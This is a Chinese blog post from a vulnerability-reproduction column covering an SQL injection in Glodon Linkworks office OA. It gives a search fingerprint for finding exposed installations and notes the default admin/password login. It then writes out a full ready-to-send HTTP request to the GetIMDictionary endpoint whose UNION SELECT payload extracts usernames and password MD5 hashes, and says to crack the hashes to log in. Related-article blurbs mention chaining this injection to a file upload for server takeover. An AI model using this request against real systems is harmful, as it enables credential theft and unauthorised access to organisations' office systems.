广联达办公OA-SQL注入漏洞

最新推荐文章于 2024-06-17 11:56:24 发布
最新推荐文章于 2024-06-17 11:56:24 发布
阅读量505 收藏 2
点赞数 1
分类专栏: 漏洞复现 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_49025459/article/details/132557816
版权

该文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者无关。

漏洞复现

广联达办公OA是一款综合办公自动化解决方案,旨在提高组织内部的工作效率和协作能力。它提供了一系列功能和工具,帮助企业管理和处理日常办公任务、流程和文档。默认弱口令admin password,后面就不提了。

资产收集

web.body="/Services/Identification/Server/"

构造请求包

 

POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1
Host:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Content-Length: 77

key=1' UNION ALL SELECT top 1 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --

 发送请求包,在返回包里面会存在账号已经密码的MD5值,需要对MD5值进行解密,才能得到登录密码

 

仲瑿
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
广联达OA GetUserByUserCode SQL注入漏洞
xiaokp7的博客
09-13 449
广联达办公OA(Office Automation)是一款综合办公自动化解决方案,旨在提高组织内部的工作效率和协作能力。它提供了一系列功能和工具,帮助企业管理和处理日常办公任务、流程和文档。由于 广联达 Linkworks办公OA GetUserByUserCode接口未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞
广联达 Linkworks办公OA SQL注入+后台文件上传漏洞复现(HW0day)
0xSec
08-12 3707
​​由于 广联达 Linkworks办公OA GetIMDictionary接口未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。而msgbroadcastuploadfile.aspx 存在后台文件上传漏洞,攻击者通过SQL注入获取管理员信息后,可以登陆发送请求包获取服务器权限。
漏洞复现】广联达 Linkworks办公OA SQL注入
zkaqlaoniao的博客
10-27 377
广联达办公OA是一款综合办公自动化解决方案,旨在提高组织内部的工作效率和协作能力。它提供了一系列功能和工具,帮助企业管理和处理日常办公任务、流程和文档。
广联达OA前台sql注入+后台文件上传漏洞复现分析
博客地址 www.sec0nd.top
08-15 2225
广联达OA前台sql注入+后台文件上传漏洞复现分析
广联达OA后台msgbroadcastuploadfile.aspx任意文件上传漏洞
xiaokp7的博客
09-13 359
广联达Linkworks办公OA(Office Automation)是一款综合办公自动化解决方案,旨在提高组织内部的工作效率和协作能力。它提供了一系列功能和工具,帮助企业管理和处理日常办公任务、流程和文档。msgbroadcastuploadfile.aspx接口处存在后台文件上传漏洞,攻击者通过SQL注入获取管理员信息后,可以登陆发送请求包获取服务器权限。
1day广联达-EmailAccountOrgUserService-sql注入漏洞
weixin_43167326的博客
01-22 499
广联达Linkworks办公
广联达-EmailAccountOrgUserService-sql注入漏洞复现
Keepb1ue的博客
01-29 648
广联达OA是一款为企业提供综合办公解决方案的软件。它集成了多种功能,包括文档管理、流程审批、任务分配等,旨在提高企业内部的工作效率和协作能力。同时,广联达OA还注重安全性,通过多种措施保护企业数据和信息的安全。使用广联达OA,企业可以更加高效、便捷地处理日常办公任务,提升整体运营效率。
广联达OA sql注入.zip
08-24
已实现漏洞验证脚本
广联达软件教程-学习课件.ppt
11-21
广联达软件教程-学习课件.ppt
1号办公楼-广联达学生实训(附加清单表)
06-23
理工学院19级工程造价学生实训所使用的GTJ(附加工程量清单)模型,可用于教学等方面。 首先说明几点 1.这个模型画了很久,肯定有很多地方有问题,细节问题也没在管了。自己尝试发现问题 2.我这里有GTJ2021和2018...
广联达图形软件-问题集(全部).docx
11-21
广联达图形软件是一款在建筑行业中广泛使用的专业软件,它主要用于建筑设计、工程量计算和施工图绘制。这个软件的问题集涵盖了多个关键功能和常见问题,包括柱、墙的绘制和编辑,模板面积计算,以及特殊结构如人防墙...
广联达软件培训-怎样用软件算量.ppt
11-21
广联达软件培训-怎样用软件算量.ppt
在物联网设备安全中,如何有效进行固件更新管理?
2403_84237550的博客
06-17 371
• 更新后持续监控设备状态,评估更新效果,及时发现并解决更新带来的新问题。在物联网设备安全中,有效进行固件更新管理是一个关键环节,涉及到多个步骤和策略,以确保更新过程既安全又高效。• 在部署固件更新前,进行全面的安全验证和兼容性测试,确保更新包的来源可靠,未被篡改,并且不会影响设备的正常运行。• 记录每次固件更新的详细信息,包括更新时间、版本号、更新内容和操作人员等,以便追溯和审计。• 加强用户对固件更新重要性的认识,教育用户如何正确执行和验证更新,提升整体安全意识。
物理隔离后数据怎么导入和导出?安全U盘一键解决
文件数据安全交换
06-13 393
飞驰云联是中国领先的数据安全传输解决方案提供商,长期专注于安全可控、性能卓越的数据传输技术和解决方案,公司产品和方案覆盖了跨网跨区域的数据安全交换、供应链数据安全传输、数据传输过程的防泄漏、FTP的增强和国产化替代、文件传输自动化和传输集成等各种数据传输场景。可配置多种组合条件对不合规的文件进行阻断,只有符合安全标准的文件才能发送。由于是物理隔离,一般的数据交换工具无法使用,此时,常用的是物理手段,如U盘、光盘刻录等,但普遍的U盘、光盘是无法满足上述数据导入导出需求的,这就需要专业的安全U盘来解决。
揭秘网络安全攻防战
最新发布
waitaikong_的博客
06-17 531
随着互联网的普及,网络安全成为企业和个人关注的焦点。网络安全不仅关系到个人隐私的保护,还影响到企业的商业机密和国家的主权安全。因此,了解和掌握网络安全攻防战的相关知识,对于构建稳固的网络防御体系至关重要。网络安全攻防战是一场没有硝烟的战争,它要求我们不仅要了解当前的攻防技术,还要预见未来可能出现的新威胁,并提前做好准备。通过不断的学习和实践,我们可以提高自己在这方面的知识和技能,为保护网络安全贡献力量。未来的攻击手段将更加多样化和复杂化,防御策略也需要不断地更新和升级以应对新的挑战。
夏季河湖防溺水新举措:青犀AI视频智能监控系统保障水域安全
TSINGSEE青犀视频官方技术博客
06-13 968
管理人员可以随时随地查看水域情况,及时发现并处理安全隐患,加强夏季防溺水监管。
软件安全测评有哪些测试流程?第三方检测机构进行安全测评的好处
卓码测评
06-12 470
在今天的高科技时代,软件产品已经成为人们生活和工作的重要组成部分。然而,与其普及和深入应用的,软件安全问题也日益凸显。
如何保护云主机安全
Canon_YK的博客
06-14 525
通过对访问权限和应用程序进行精确控制,可以减少对服务器的无效访问和恶意请求,降低服务器的负载,提高性能和稳定性。首先,建立完善的白名单管理制度和流程,明确白名单的添加、删除和修改等操作权限和流程,确保白名单的准确性和有效性。其次,加强对白名单技术的培训和宣传,提高员工的安全意识和技能水平,使其能够正确理解和使用白名单技术。深信达MCK主机加固系统是基于可信计算技术,锁定工作场景、实行严格场景白名单控制,受保护的主机只能做白名单规定的事情,任何白名单之外的、陌生程序都无法运行。
广联达 oa 文件上传
01-09
广联达 OA是一款便捷高效的办公管理软件,其中的文件上传功能可以帮助用户快速、方便地上传文件。使用广联达 OA进行文件上传的步骤如下: 1. 打开广联达 OA软件,登陆自己的账号。 2. 在软件的界面中,找到菜单栏或工具栏中的文件上传选项,点击进入文件上传界面。 3. 在文件上传界面中,用户可以选择需要上传的文件。可以使用自己电脑中的文件浏览功能,或者直接将文件拖拽到上传区域。 4. 选择需要上传的文件后,点击确认或上传按钮,等待文件上传的过程。上传速度会根据文件大小和网络状况而有所不同。 5. 当文件上传完成后,用户可以使用广联达 OA的其他功能继续进行工作,或者在需要时访问已上传的文件。 广联达 OA文件上传功能的特点是简单易用,用户只需几步即可完成文件上传操作。另外,广联达 OA还提供了文件管理功能,用户可以在上传后对文件进行分类、排序、搜索等管理操作,使文件的查找和使用更加方便。 需要注意的是,由于文件上传涉及到网络传输,用户在上传时需要确保网络连接稳定,以免出现上传失败或文件损坏等情况。另外,为了保护文件的安全,用户在上传时可以选择设置文件访问权限,确保只有授权人员可以查看和使用文件。 总之,广联达 OA文件上传功能能够满足用户在办公过程中的文件管理需求,使文件的传输和管理变得更加简单高效。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

仲瑿

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值